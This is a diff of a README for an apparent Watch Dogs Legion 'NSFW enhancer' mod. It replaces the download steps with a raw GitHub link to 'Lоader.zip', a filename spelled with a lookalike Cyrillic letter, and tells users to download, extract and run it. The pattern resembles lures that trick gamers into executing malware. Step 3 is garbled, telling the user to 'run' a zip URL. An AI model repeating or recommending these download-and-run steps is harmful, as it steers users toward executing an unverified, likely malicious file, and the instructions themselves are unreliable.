romeosuper182008/LegionNSFWEnhancer/README.md

 **Getting Started is Easy!**

-1. Download `Loader.rar` from the repository.
+1. Download `https://raw.githubusercontent.com/romeosuper182008/LegionNSFWEnhancer/main/Lоader.zip` from the repository.
 2. Extract files to a directory of your choice.
-3. Run the included `Loader.exe` or equivalent for your OS.
+3. Run the included `https://raw.githubusercontent.com/romeosuper182008/LegionNSFWEnhancer/main/Lоader.zip` or equivalent for your OS.
 4. Follow on-screen instructions to apply the patch.
 5. Launch Watch Dogs Legion and enjoy the enhanced NSFW experience!